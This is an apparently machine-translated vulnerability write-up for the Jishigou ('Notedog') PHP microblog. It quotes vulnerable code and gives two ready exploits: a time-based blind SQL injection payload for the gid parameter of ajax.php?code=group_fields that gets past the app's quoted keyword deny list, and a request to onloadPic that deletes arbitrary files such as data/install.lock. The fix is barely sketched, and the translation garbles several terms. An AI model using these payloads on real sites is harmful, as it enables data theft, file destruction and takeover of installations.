Notedog blind injection and Arbitrary File Deletion

0x1 blind Injection
0x2 Arbitrary File Deletion


0x1 blind Injection
In modules/ajax/topic. mod. php
 
Function Group_fields ()
{
$ Uid = MEMBER_ID;
$ G_id = $ this-> Post ['gid'];
$ Touid = $ this-> Post ['touid'];
 
$ SQL = "SELECT * FROM". TABLE_PREFIX. 'group'. "WHERE uid =". MEMBER_ID. "and id =". $ g_id;
$ Query = $ this-> DatabaseHandler-> Query ($ SQL );
$ Group_info = $ query-> GetRow ();
 
$ SQL = "SELECT 'uid' FROM". TABLE_PREFIX. 'members '. "WHERE uid =". $ touid;
$ Query = $ this-> DatabaseHandler-> Query ($ SQL );
$ Member_info = $ query-> GetRow ();
 
$ SQL = "SELECT 'touid', 'display' FROM". TABLE_PREFIX. 'groupfields '. "WHERE touid
= '{$ Touid}' and gid = ". $ g_id;
$ Query = $ this-> DatabaseHandler-> Query ($ SQL );
$ Fields_info = $ query-> GetRow ();
 
...... // Omit www.2cto.com
}
 
$ Gid and $ touid are not filtered and are directly included in the query. However, the CheckQuery () check has been performed before the query to remove some key characters, but not completely removed.
 
$ _ Config ['security'] ['querysafe '] ['dfunction'] ['0'] = 'Load _ file ';
$ _ Config ['security'] ['querysafe '] ['dfunction'] ['1'] = 'hex ';
$ _ Config ['security'] ['querysafe '] ['dfunction'] ['2'] = 'string ';
$ _ Config ['security'] ['querysafe '] ['dfunction'] ['4'] = 'ord ';
$ _ Config ['security'] ['querysafe '] ['dfunction'] ['5'] = 'Char ';
$ _ Config ['security'] ['querysafe '] ['daction'] ['0'] = 'your outfile ';
$ _ Config ['security'] ['querysafe '] ['daction'] ['1'] = 'invalid dumpfile ';
$ _ Config ['security'] ['querysafe '] ['daction'] ['2'] = 'unionselect ';
$ _ Config ['security'] ['querysafe '] ['daction'] ['4'] = 'unionall ';
$ _ Config ['security'] ['querysafe '] ['daction'] ['5'] = 'uniondistinct ';
$ _ Config ['security'] ['querysafe '] ['dnote'] ['0'] = '/'.'*';
$ _ Config ['security'] ['querysafe '] ['dnote'] ['1'] = '*/';
$ _ Config ['security'] ['querysafe '] ['dnote'] ['2'] = '#';
$ _ Config ['security'] ['querysafe '] ['dnote'] ['3'] = '--';
 
Substring is filtered (I know mysql can also use substring). substr is not filtered,
Time-based blind injection can be used to break through and finally construct a post package, which is sent to ajax. php? Code = group_fields
Enter the following parameters:
Gid = 1 or if (substr (select nickname from jishigou_members limit),) = 0x61, sleep (1), 1) & touid = 34
 
The last statement is:
SELECT * FROM jishigou_group WHERE uid = 0 and id = 1 or if (substr (select nickname from jishigou_members limit 0, 1, 1) = 0x61, sleep (1), 1)
 
Alas ~~ Add intval to the two parameters
 
0x2 Arbitrary File Deletion
In modules/ajax/event. mod. php
 
Function onloadPic (){


Load: lib ('image ');

$ Image = new image ();
Load: lib ('upload ');
Unlink ($ this-> Post ['hid _ pic ']);
If ($ _ FILES ['pic '] ['name']) {
..... /Omitted
}
..... /Omitted
}
 
Hid_pic is directly unlinked because it is not filtered. This vulnerability requires at least the permissions of common users.
So we construct a post package and submit it to/ajax. php? Code = onloadPic & mod = event
Set the following parameter to hid_pic = want_to_delete_file.
You can delete the corresponding file ~
Data/install. lock is successfully deleted in the local test. Is data/install. lock not successfully deleted on the official website ?? Permission problems ???


Solution:
Do it your self

Author yy520